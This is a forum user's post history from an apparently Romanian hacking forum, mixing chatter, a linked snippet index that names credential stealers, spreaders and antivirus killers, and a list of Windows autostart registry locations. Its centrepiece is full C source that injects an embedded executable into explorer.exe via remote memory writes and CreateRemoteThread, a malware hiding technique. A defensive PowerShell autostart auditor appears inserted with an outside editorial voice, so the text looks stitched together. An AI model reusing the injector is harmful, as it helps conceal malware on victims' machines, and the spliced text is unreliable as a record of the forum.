Everything posted by Nytro
Based on how smart they are, based on invitations, based on who can hold their drink better... Why should there be some specific requirement to be a member of the forum? Is it that important to be a member here? What would they have to gain? I'd say we should charge them money then...
I don't really understand why you want VIP... Well, let me see, if I go fifty-fifty with kwe, or has he quit drinking...?
I got myself some "memoranda", I think they're called, small-format booklets with tiny print and lots of nonsense in them. But for math they're suggested solutions, they won't be this year's exam questions... Math is what I'm afraid of... And still I don't know whether to risk cheating (if it's "dangerous"). Better to get a 5 (in math I don't know if I'll manage) and be happy with it.
If you're coming from hellsoft and hackforums, it's clear, I bow before you.
Theoretically you can make viruses in HTML too. <a href="aaaaaaa_nops_shellcode">A</a> And the browser engine would have to be bad and have a buffer overflow.
There are many who have nothing to do at home, xcata, and they butt in too. In practice you can use any language from which an API function can be called. Visual Basic is used because it's practically simpler, easier to learn. C++ is "cooler". And I think the main advantage is pointers. And the fact that for C++ those headers already exist. You just include <windows.h> and call the function, you don't have to declare it. But broadly, what you can do in C++ (almost anything, I think not quite everything) you can also do in Visual Basic, or C#, or another programming language.
Well, it is important. I want to see which of the big shots above is smarter.
I think I'll ban you all, since I see you're too smart for this world...
The driver the kernel has only offers read-only support for NTFS. But ntfs-3g offers read-write support. Yes, they had to be mounted if they weren't mounted automatically, as a modern operating system should do... I see this as a black mark for backtrack. Well, and one for Tinky too.
Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
Nytro replied to begood's topic in Exploituri
I was looking at the faces of these corelan guys, and they seem a bit weird to me.
Some have the baccalaureate exam.
I'll be more "involved" after I finish with the baccalaureate and then with the admission exam. It will stay the way it is now for a while.
Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
Nytro replied to begood's topic in Exploituri
Interesting. And he's the one who discovered it: http://www.corelan.be:8800/wp-content/uploads/2010/03/tecr0cFace1.jpg
Actually they were posted there too, by someone who had taken them from somewhere else. Opensc isn't exactly programmers' heaven.
If it's not a lot of work I'll take it on. I'm not too good at CSS though, but I manage.
Source: http://www.opensc.ws/snippets/10961-release-w0rmys-codebase-v2-0-a.html

Snippets:
Bash - Backup Script.txt
Bash - Battery Life.txt
Bash - BlackJack.txt
Bash - Change (mask) the MAC address on your nic.txt
Bash - Detect then eject the cdrom.txt
Bash - File Limiter.txt
Bash - PPP Connection Checker.txt
Bash - Recursive Linecount in directory.txt
Bash - Resolve&Display your IP Address.txt
Bash - Retreive the complete list of ports.txt
Bash - Setting up common aliases.txt
Bash - Simple Bash backup script.txt
Bash - Simple firewall script.txt
Bash - Take Screenshots of Xwindows.txt
C# - Add proxy support to webbrowser.txt
C# - Anti Sandboxie.txt
C# - AntiSandboxie.txt
C# - Anti ThreatExpert.txt
C - Binary Adder.txt
C# - Calculate an exponent.txt
C# - CD Key Stealer.txt
C# - Check Avaible Posts.txt
C# - Check for 64bits OS.txt
C# - Check if a file is already open (or read only).txt
C# - Check if a printer is offline or online.txt
C# - Check if a process is running.txt
C# - Check if the CD-ROM is loaded.txt
C# - Count vowels in a string.txt
C# - Create a new net user.txt
C# - Create local Windows user account.txt
C - Creates a magic square.txt
C - DateTime with windows.h.txt
C# - Delete registry key value in HKEY_CLASSES_ROOT.txt
C# - Delete Self.txt
C# - Desactivate UAC.txt
C# - Disable Task Manager.txt
C++ - Disable Task Manager.txt
C# - Downloader.txt
C - Echo.txt
C# - Empty Recycle Bin.txt
C# - Encryption Class.txt
C# - EOF Data.txt
C# - FileZilla Stealer.txt
C# - Generate a random color with XNA.txt
C# - Generate password.txt
C# - Get 3 letters computer country name.txt
C# - Get a file's MD5 Hash.txt
C# - Get a HTML Page's Title.txt
C# - Get current users profile type (using Win32 API).txt
C# - Get Headers from a website.txt
C# - Get info about drives installed.txt
C# - Get info about physical memory.txt
C# - Get IP Information.txt
C# - Get recycle bin's size and file count.txt
C# - Get RecycleBin's size and file count.txt
C# - Gets the contents of a pastebin entry by id.txt
C# - Getting the HEX.txt
C# - Get UNC path of mapped drives.txt
C# - Get users default browser.txt
C# - Get your Gmail contact list.txt
C - Gnome Sort.txt
C# - Hiding console window.txt
C# - IP address range finder helper class.txt
C# - Kill Ad-Adware.txt
C# - Kill a process by user.txt
C# - Kill Malwarebytes Anti-Malware.txt
C# - Kill SpyBot Search&Destroy.txt
C# - Mutex.txt
C - Name of current user.txt
C# - Open Windows Firewall Port.txt
C# - Post to Pastebin!.txt
C - ReadWord.txt
C# - Rendering text with a shadow in XNA.txt
C++ - Restart your computer.txt
C# - Retrieve all computers on network.txt
C# - Retrieve list of avaible printer ports.txt
C# - Send Email with Attachment.txt
C# - Session for WinForms.txt
C# - Set default printer.txt
C# - ShiftList.txt
C# - Show&Hide desktop icons.txt
C# - Show&hide Windows Taskbar.txt
C# - Simple 2D line in XNA.txt
C# - Split String.txt
C# - Static dll injector.txt
C# - Take screenshot.txt
C# - USB Spread.txt
C# - Use WMI to get a list of all installed printers.txt
C# - Use WMI to get the system's up-time.txt
C# - uTorrent seeder.txt
C# - Windows autostart.txt
C# - XOR Encryption.txt
Delphi - Bytes to real size.txt
Delphi - Default Browser.txt
Delphi - Disable XP Firewall.txt
Delphi - Get File Info.txt
Delphi - Ip&Port Check Utility.txt
Delphi - Little injection.txt
Delphi - Screenshot with mouse position.txt
Delphi - Uptime (Spy-Net).txt
F# - AES Encryption.txt
F# - IRC Bot.txt
Lisp - A Clojure function to find the average of an arbitrary number of numbers.txt
Lisp - A function to flip the arguments of another function in Clojure.txt
Lisp - Compute factorial in Clojure.txt
Lisp - Computer Generated HAIKU.txt
Lisp - Example of using refs to maintain, alter, and use mutable state in Clojure.txt
Lisp - Fibonacci Sequence.txt
Lisp - Fibonancci Sequence.txt
Lisp - File IO example using c.c.duck-streams in Clojure.txt
Lisp - Function to find the max value in a sequence in Clojure.txt
Lisp - GPA Calculator.txt
Lisp - Swing example in Clojure.txt
Lisp - Tic-Tac-Toe.txt
Python - CS Server Info.txt
Python - Get TITLE.txt
Python - Google Search.txt
Python - IRC Bot (l33t).txt
Python - IRC Bot.txt
Python - MD5 Search.txt
Python - Skype Bot.txt
Ruby - Angle Conversion.txt
Ruby - Bandwidth Usage in Linux.txt
Ruby - Check if a number is prime.txt
Ruby - Defficient Number.txt
Ruby - Get Confirmation.txt
Ruby - Hangman.txt
Ruby - Regression Line.txt
Ruby - Reverse a string.txt
Ruby - ROT13.txt
Ruby - Sum of any series.txt
Ruby - Sum of Divisors.txt
Ruby - Write a number in English.txt
VB6 - Admin Check.txt
VB6 - Automatic shutdown for windows in VBS.txt
VB6 - Change Desktop Settings via registry.txt
VB6 - Change System Date Format.txt
VB6 - Check if a file exists.txt
VB6 - Check if exe is running.txt
VB6 - Close all forms in your applications.txt
VB6 - Convert Binary To Decimal.txt
VB6 - Copy all files from directory to another.txt
VB6 - Detect Windows Version.txt
VB6 - Disable Ctrl+Alt+Del.txt
VB6 - Download a file from the Internet.txt
VB6 - Download file using FTP.txt
VB6 - DynDNS Stealer.txt
VB6 - Easy read&write to Windows registry.txt
VB6 - File Download to Temp Dir.txt
VB6 - FileZilla Stealer.txt
VB6 - Find your application's path.txt
VB6 - Get default browser in 5 lines.txt
VB6 - Get MSN Passwords.txt
VB6 - Get OS Version.txt
VB6 - Get Screen Resolution.txt
VB6 - Get System Volume Information.txt
VB6 - Get Windows Username.txt
VB6 - Hangman.txt
VB6 - Kill a file in use.txt
VB6 - Open&Close CD ROM.txt
VB6 - Password Generator.txt
VB6 - Prevent a program from running.txt
VB6 - Read Registry.txt
VB6 - Running Programs Using VBScript.txt
VB6 - Send Batch Email.txt
VB6 - Show&Hide Taskbar (WINDOWS).txt
VB6 - Shutdown Windows.txt
VB6 - Simple en&decryption.txt
VB6 - String Rotation.txt
VB6 - System Start Time.txt
VB6 - Tic Tac Toe.txt
VB6 - Turn Off Monitor.txt
VB6 - Upload file to FTP Server.txt
VB6 - Windows Running Time.txt
VB6 - Windows XP Task manager Disabler&Enabler.txt
VB6 - Write to registry.txt
VB6 - XOR Encryption Function.txt
VB6 - Zip files with WinZip in VB6.txt
VB.NET - 4chan spammer.txt
VB.NET - Add to startup (Registry).txt
VB.NET - Animating Text.txt
VB.NET - Anti Modules.txt
VB.NET - Auto Crop Image.txt
VB.NET - Base64 to image.txt
VB.NET - Bomb noise.txt
VB.NET - Calculated Click.txt
VB.NET - Calender.txt
VB.NET - Change Desktop Background.txt
VB.NET - Change the language of your application.txt
VB.NET - Change Wallpaper.txt
VB.NET - Check Battery Status.txt
VB.NET - Check if exe is running.txt
VB.NET - Check if file is in use.txt
VB.NET - Check if username is in use.txt
VB.NET - Check URL for availability.txt
VB.NET - Check Windows Password.txt
VB.NET - Clear IE Browser History&Cookies.txt
VB.NET - Convert file size to KB, MB, GB and TB.txt
VB.NET - Convert file size to KB,MB,GB, TB.txt
VB.NET - Corrupt.txt
VB.NET - Cripple EXE.txt
VB.NET - Cryptographu - Encryptions&Decryptions.txt
VB.NET - Date Extensions.txt
VB.NET - Delete Cookies.txt
VB.NET - Disable Firewall.txt
VB.NET - Disable 'Show Hidden Files and Folders Option'.txt
VB.NET - Disable [X], ALT+F4, CTRL+W and context.txt
VB.NET - Empty Recycle Bin.txt
VB.NET - Enumerate Installed Software.txt
VB.NET - FireFTP Passwords.txt
VB.NET - Force Steam login.txt
VB.NET - Format a phone number.txt
VB.NET - FormatWith.txt
VB.NET - Generate Captcha.txt
VB.NET - Get all table & Column names from database.txt
VB.NET - GetBetweenAll.txt
VB.NET - GetBetween.txt
VB.NET - Get COD4 Key.txt
VB.NET - Get default browser path.txt
VB.NET - Get External IP.txt
VB.NET - Get Folder Size.txt
VB.NET - Get how long the computer has been running.txt
VB.NET - Get or set Desktop background color.txt
VB.NET - Get own Internet IP.txt
VB.NET - Get percent value.txt
VB.NET - Give file an attribute.txt
VB.NET - Handling .ini files.txt
VB.NET - Hash.txt
VB.NET - Hide a process window.txt
VB.NET - Instant PC Shutdown.txt
VB.NET - Invert colors from image.txt
VB.NET - Log file.txt
VB.NET - MD5 from file.txt
VB.NET - MD5 Hash.txt
VB.NET - Melt File - NO DROPS.txt
VB.NET - Minimize to tray.txt
VB.NET - Mouse Click.txt
VB.NET - MsgBox If statement.txt
VB.NET - MSN Nickname Changer.txt
VB.NET - MSN Spreader.txt
VB.NET - Multiple File Copy.txt
VB.NET - Null PE Info.txt
VB.NET - Packetwise File Copy.txt
VB.NET - Polymorphic RC4 Encryption.txt
VB.NET - Prevent Search.txt
VB.NET - Program Updater.txt
VB.NET - ProgressBar code.txt
VB.NET - RC4 Encryption.txt
VB.NET - Read&Write EOF.txt
VB.NET - Resize image to fit in picturebox.txt
VB.NET - Resolution Math.txt
VB.NET - Screenshot.txt
VB.NET - Show system time.txt
VB.NET - String & Image Conversion.txt
VB.NET - Strip HTML.txt
VB.NET - Test for Internet Connection.txt
VB.NET - Windows Live Messenger 'Now Playing'.txt

Download: http://www.2shared.com/file/tTxgNb0z/Documents.html
I don't know who found them all:

Registry Autostart Locations
1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ - All values in this key are executed.
2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\ - All values in this key are executed, and then their autostart reference is deleted.
3. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ - All values in this key are executed as services.
4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\ - All values in this key are executed as services, and then their autostart reference is deleted.
5. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ - All values in this key are executed.
6. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\ - All values in this key are executed, and then their autostart reference is deleted.
7. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\ - Used only by Setup. Displays a progress dialog box as the keys are run one at a time.
8. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\ - Similar to the Run key from HKEY_CURRENT_USER.
9. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\ - Similar to the RunOnce key from HKEY_CURRENT_USER.
10. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - The "Shell" value is monitored. This value is executed after you log in.
11. HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ - All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey.
12. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\ - All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey.
13. HKEY_CURRENT_USER\Control Panel\Desktop - The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates.
14. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager - The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts.
15. HKEY_CLASSES_ROOT\vbsfile\shell\open\command\ - Executed whenever a .VBS file (Visual Basic Script) is run.
16. HKEY_CLASSES_ROOT\vbefile\shell\open\command\ - Executed whenever a .VBE file (Encoded Visual Basic Script) is run.
17. HKEY_CLASSES_ROOT\jsfile\shell\open\command\ - Executed whenever a .JS file (Javascript) is run.
18. HKEY_CLASSES_ROOT\jsefile\shell\open\command\ - Executed whenever a .JSE file (Encoded Javascript) is run.
19. HKEY_CLASSES_ROOT\wshfile\shell\open\command\ - Executed whenever a .WSH file (Windows Scripting Host) is run.
20. HKEY_CLASSES_ROOT\wsffile\shell\open\command\ - Executed whenever a .WSF file (Windows Scripting File) is run.
21. HKEY_CLASSES_ROOT\exefile\shell\open\command\ - Executed whenever a .EXE file (Executable) is run.
22. HKEY_CLASSES_ROOT\comfile\shell\open\command\ - Executed whenever a .COM file (Command) is run.
23. HKEY_CLASSES_ROOT\batfile\shell\open\command\ - Executed whenever a .BAT file (Batch Command) is run.
24. HKEY_CLASSES_ROOT\scrfile\shell\open\command\ - Executed whenever a .SCR file (Screen Saver) is run.
25. HKEY_CLASSES_ROOT\piffile\shell\open\command\ - Executed whenever a .PIF file (Portable Interchange Format) is run.
26. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ - Services marked to startup automatically are executed before user login.
27. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_Entries\ - Layered Service Providers, executed before user login.
28. HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline - Executed when a 16-bit Windows executable is executed.
29. HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline - Executed when a 16-bit DOS application is executed.
30. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit - Executed when a user logs in.
31. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\ - Executed by explorer.exe as soon as it has loaded.
32. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run - Executed when the user logs in.
33. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load - Executed when the user logs in.
34. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\ - Subvalues are executed when Explorer initialises.
35. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\ - Subvalues are executed when Explorer initialises.

Folder Autostart Locations
1. windir\Start Menu\Programs\Startup\
2. User\Startup\
3. All Users\Startup\
4. windir\system\iosubsys\
5. windir\system\vmm32\
6. windir\Tasks\

File Autostart Locations
1. c:\explorer.exe
2. c:\autoexec.bat
3. c:\config.sys
4. windir\wininit.ini
5. windir\winstart.bat
6. windir\win.ini - [windows] "load"
7. windir\win.ini - [windows] "run"
8. windir\system.ini - [boot] "shell"
9. windir\system.ini - [boot] "scrnsave.exe"
10. windir\dosstart.bat
11. windir\system\autoexec.nt
12. windir\system\config.nt

Hope it helps
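As an added defender-side example (my own code, not part of Nytro's post or of the list's original compiler), the following PowerShell script reads the Run-style keys, the named Winlogon/Session Manager/Desktop values and the file-type handler commands from the registry list above, prints what is currently configured, and can diff that against a saved baseline so a later run shows only what changed. Every registry path is taken from the list; the baseline file name, the line format and the `(default)`-value handling of the class keys are assumptions of mine. The script only reads the registry.

```powershell
# Added example (not from the original post): read-only enumeration of the
# autostart registry locations listed above, with an optional baseline diff.
# Assumptions of mine: the output line format and the baseline file location.

# Keys where every value is a command line (Run, RunOnce, Policies\Explorer\Run, ...)
$RunStyleKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad'
)

# Single named values that hold a command line or a module list
$NamedValues = @(
    @{ Key = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Shell' },
    @{ Key = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Userinit' },
    @{ Key = 'HKLM:\System\CurrentControlSet\Control\Session Manager';     Name = 'BootExecute' },
    @{ Key = 'HKCU:\Control Panel\Desktop';                                Name = 'SCRNSAVE.EXE' },
    @{ Key = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows';  Name = 'Load' },
    @{ Key = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows';  Name = 'Run' }
)

# File-type handlers: the (default) value of shell\open\command is what runs that file type
$ClassHandlers = @('exefile', 'comfile', 'batfile', 'scrfile', 'piffile',
                   'vbsfile', 'vbefile', 'jsfile', 'jsefile', 'wshfile', 'wsffile')

function Get-AutostartEntries {
    $entries = New-Object System.Collections.Generic.List[object]

    foreach ($key in $RunStyleKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # PSPath, PSParentPath, PSChildName, PSDrive, PSProvider are provider metadata, not values
            if ($p.Name -like 'PS*') { continue }
            $entries.Add([pscustomobject]@{ Location = $key; Name = $p.Name; Command = [string]$p.Value })
        }
    }

    foreach ($nv in $NamedValues) {
        if (-not (Test-Path -Path $nv.Key)) { continue }
        $value = (Get-ItemProperty -Path $nv.Key -Name $nv.Name -ErrorAction SilentlyContinue).($nv.Name)
        if ($null -ne $value) {
            # BootExecute is REG_MULTI_SZ; join it so one line shows the whole list
            $entries.Add([pscustomobject]@{ Location = $nv.Key; Name = $nv.Name; Command = (@($value) -join ' | ') })
        }
    }

    foreach ($cls in $ClassHandlers) {
        $key = "Registry::HKEY_CLASSES_ROOT\$cls\shell\open\command"
        if (-not (Test-Path -Path $key)) { continue }
        $cmd = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'(default)'
        if ($cmd) {
            $entries.Add([pscustomobject]@{ Location = $key; Name = '(default)'; Command = [string]$cmd })
        }
    }
    return $entries
}

function Compare-AutostartBaseline {
    param([Parameter(Mandatory)][string]$BaselinePath)
    $current = Get-AutostartEntries
    $asLine  = { "$($_.Location) :: $($_.Name) = $($_.Command)" }
    if (-not (Test-Path -Path $BaselinePath)) {
        # First run: record the current state so later runs report only changes
        $current | ForEach-Object $asLine | Set-Content -Path $BaselinePath
        Write-Output "Baseline written: $BaselinePath ($($current.Count) entries)"
        return
    }
    $old  = @(Get-Content -Path $BaselinePath)
    $new  = @($current | ForEach-Object $asLine)
    $diff = Compare-Object -ReferenceObject $old -DifferenceObject $new
    if (-not $diff) { Write-Output 'No autostart changes since baseline'; return }
    foreach ($d in $diff) {
        $tag = if ($d.SideIndicator -eq '=>') { 'ADDED  ' } else { 'REMOVED' }
        Write-Output "$tag $($d.InputObject)"
    }
}

# Usage: list everything, then record or diff against the baseline file
Get-AutostartEntries | Format-Table -AutoSize -Wrap
Compare-AutostartBaseline -BaselinePath "$env:USERPROFILE\autostart-baseline.txt"
```

Run it once to write the baseline, then again after installing software or after a suspicious event; anything that appears as ADDED in one of these locations is a persistence candidate worth inspecting. Folder and file locations from the list (Startup folders, win.ini, system.ini) are not covered here and would need a similar file-based pass.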
Author: #Zero

Zero: Well, this code injects the executable that it has in its resource section into the 'explorer.exe' process. The code really injects the executable; this will not create a new 'explorer.exe' process.

#pragma comment (linker,"/NODEFAULTLIB")
#pragma comment (linker,"/ENTRY:main")
#include <windows.h>
#include <Tlhelp32.h>
#include "resource.h"

int main()
{
    PIMAGE_DOS_HEADER IDH;
    PIMAGE_NT_HEADERS INTH;
    PIMAGE_SECTION_HEADER ISH;

    // Load the resource
    HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE");
    DWORD ResourceSize=SizeofResource(NULL,hResource);
    HGLOBAL hGlob=LoadResource(NULL,hResource);
    LPSTR lpFileMaped=(LPSTR)LockResource(hGlob);

    // Read the DOS and PE headers into the structures
    IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0];
    INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew];

    DWORD PID=0;
    HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 pInfo;
    pInfo.dwSize=sizeof(PROCESSENTRY32);

    // Get the PID of 'explorer.exe'
    Process32First(hSnapshot,&pInfo);
    for(;lstrcmpA(pInfo.szExeFile,"explorer.exe");)
    {
        Process32Next(hSnapshot,&pInfo);
    }
    CloseHandle(hSnapshot);
    PID=pInfo.th32ProcessID;

    // Open the process we will inject into
    HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID);

    // Create a buffer of SizeOfImage bytes in which we will load the executable
    LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    // Copy the DOS and PE headers to the buffer
    WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0);

    // Copy the sections to their VirtualOffset in the buffer
    for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++)
    {
        ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i];
        WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0);
    }

    // Compute the delta between the buffer address and the ImageBase
    DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase);

    //------------------------------------------------------------
    /* - Relocate the executable's base address - */
    //------------------------------------------------------------
    // If there is no relocation table, exit
    if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0)
    {
        MessageBoxA(0,"No hay relocation table!",0,0);
        return false;
    }

    // Get the Image Base Relocation
    // Copy the Image Base Relocation from the data in the target process into a buffer of our own
    // so we can work with it more comfortably
    PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION));
    PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
    ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);

    // Walk all the relocation blocks
    for (DWORD n=0;IBR->VirtualAddress>0;n++)
    {
        // Get the relocation block
        LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress);
        // Get the first entry of the block
        LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION));
        // Walk all the entries of the block
        for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++)
        {
            WORD valor;
            ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0);
            // Get the 4 bits that define the relocation type
            DWORD type=valor>>12;
            // Get the 12 bits that define the relocation offset
            DWORD offset=valor&0xFFF;
            // If the relocation type is relative to the base address, add the delta
            if(type==IMAGE_REL_BASED_HIGHLOW)
            {
                // Add to the address that depends on the original imagebase
                // the delta between the imagebase and our base address
                LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset);
                DWORD NewValue;
                ReadProcessMemory(hProcess,newAddr,&NewValue,4,0);
                NewValue+=Delta;
                WriteProcessMemory(hProcess,newAddr,&NewValue,4,0);
            }
        }
        // Go to the next block
        PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock);
        ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);
    }
    GlobalFree(IBR);

    //---------------------------------------------------------------------
    /* - Load the IAT values so the APIs can be called - */
    //---------------------------------------------------------------------
    PIMAGE_THUNK_DATA ITD;
    PIMAGE_THUNK_DATA PITD;
    PIMAGE_IMPORT_BY_NAME IIBN;

    // Check whether there is an Import Data Descriptor
    if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0)
    {
        // Get the Import Data Descriptor
        // Copy the Import Data Descriptor from the data in the target process into a buffer of our own
        // so we can work with it more comfortably
        PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR));
        PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
        ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);

        // Walk all the DLLs imported by the executable
        for (;IID->Name;)
        {
            // Get the length of the dll name
            DWORD szName=0;
            CHAR miByte=1;
            for(int i=0;miByte;i++)
            {
                szName=i;
                ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0);
            }
            // Get the dll name
            LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1);
            ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0);
            // Load the dll
            HMODULE hLib=LoadLibraryA(lpName);
            // Get the address of the first member of the Image Thunk Data array
            PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk);
            ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA));
            ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);

            // Walk the imported functions
            for (;ITD->u1.Ordinal;)
            {
                miByte=1;
                // Get the length of the API name
                for(int i=0;miByte;i++)
                {
                    szName=i;
                    LPSTR puntero=ExeBuffer+ITD->u1.Function+2;
                    puntero+=i;
                    ReadProcessMemory(hProcess,puntero,&miByte,1,0);
                }
                // Load the Image Import By Name to get the name
                IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName);
                ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0);
                // Get the function address and store it in the IAT
                DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name);
                WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Error HERE!*/
                PITD++;
                ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);
            }
            PIID++;
            ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);
            GlobalFree(lpName);
            GlobalFree(ITD);
        }
        GlobalFree(IID);
    }

    // Get the EntryPoint of the executable we loaded into the buffer
    DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint;
    // Call the EntryPoint
    CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0);
    return 0;
}

Some users told me that with some executables the code is not running. I tried to fix it for a long time, but I couldn't do it yet, so with executables that use the C Run Time Library or something similar, the code could fail. Furthermore, I left an anti-kiddie mistake, marked with an "Error Here" comment.

Zero
It's fashionable to have lots of hacking programs on your computer, even though you don't even know what they do. Still, this is a good idea too: when you need something, you find it quickly.
There's a difference between "infected" and "detected".
A "nice" dynamic call method. I don't know the author, I think it's "Skillless".

#include <windows.h>

int main()
{
    HINSTANCE Dll = LoadLibrary("user32.dll");
    DWORD(*Func)(void) = (DWORD(*)(void))GetProcAddress(Dll, "MessageBoxA");
    HWND A = 0;
    LPCTSTR B = "Question?";
    LPCTSTR C = "Title!";
    UINT D = MB_ICONEXCLAMATION | MB_YESNO;
    asm("push %0" :: "r"(D));
    asm("push %0" :: "r"(C));
    asm("push %0" :: "r"(B));
    asm("push %0" :: "r"(A));
    Func();
    asm("pop %0" :: "r"(A));
    asm("pop %0" :: "r"(B));
    asm("pop %0" :: "r"(C));
    asm("pop %0" :: "r"(D));
    FreeLibrary(Dll);
    return 0;
}

